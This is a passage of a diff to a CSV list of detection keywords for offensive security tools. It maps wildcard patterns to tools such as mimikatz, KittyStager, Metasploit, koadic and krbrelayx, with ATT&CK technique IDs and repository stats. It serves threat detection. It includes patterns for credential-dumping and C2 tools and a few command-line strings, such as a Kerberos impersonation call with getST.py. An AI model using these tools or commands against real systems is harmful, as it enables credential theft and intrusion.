?*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*KittyStager ??*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*KittyStager.git*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*KittyStager/cmd*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*KittyStager/internal*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*KittyStager/kitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*Kiwi Legit Printer*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kitrap0d.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*kitrap0d_payload*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*kitten.dll*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*kitten/basicKitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*kitten_test.go*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*kittens/bananaKitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*Kittielocal -*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*KittyStager -*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*KittyStager ?*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*KittyStager ??*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*KittyStager.git*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*KittyStager/cmd*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*KittyStager/internal*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*KittyStager/kitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*Kiwi Legit Printer*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*klezVirus/CheeseTools*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" -"*klezVirus/inceptor*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*klezVirus/inceptor*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*klezVirus/SilentMoonwalk*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" "*klsecservices*","offensive_tool_keyword","Github Username","exploitation tools for attackers","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/klsecservices","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*klsecservices/rpivot*","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" -"*known_hosts2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*known_hosts2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" 
"*Koadic.persist*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*koadic_load.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*koadic_net.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" 
@@ -12827,7 +12983,7 @@ "*Kraken Mask by @DallasFR*","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","0","N/A","9","2","144","28","2023-08-08T15:21:28Z","2023-08-05T19:24:36Z" "*kraken.py --connect --mode * --profile * --compiler *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*KrakenMask-main*","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). 
To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","1","N/A","9","2","144","28","2023-08-08T15:21:28Z","2023-08-05T19:24:36Z" -"*krb2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*krb2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*krb5/kerberosv5.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - 
APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*KRB5CCNAME=*.ccache* getST.py -self -impersonate * -k -no-pass -dc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*krb5decoder*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" 
@@ -12843,14 +12999,14 @@ "*KrbRelay*spoofing*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*KrbRelay.csproj*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*KrbRelay.exe*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" -"*KrbRelay.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*KrbRelay.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*KrbRelay.sln*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" -"*KrbRelayUp.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*krbrelayx*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/dirkjanm/krbrelayx","1","0","N/A","10","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" -"*krbrelayx.git*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"*KrbRelayUp.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*krbrelayx*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/dirkjanm/krbrelayx","1","0","N/A","10","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"*krbrelayx.git*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" "*krbrelayx.py -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*krbrelayx.py*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" -"*krbrelayx-master*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"*krbrelayx.py*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"*krbrelayx-master*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" "*krbroast-pcap2hashcat.py*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*KRBUACBypass 1*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense 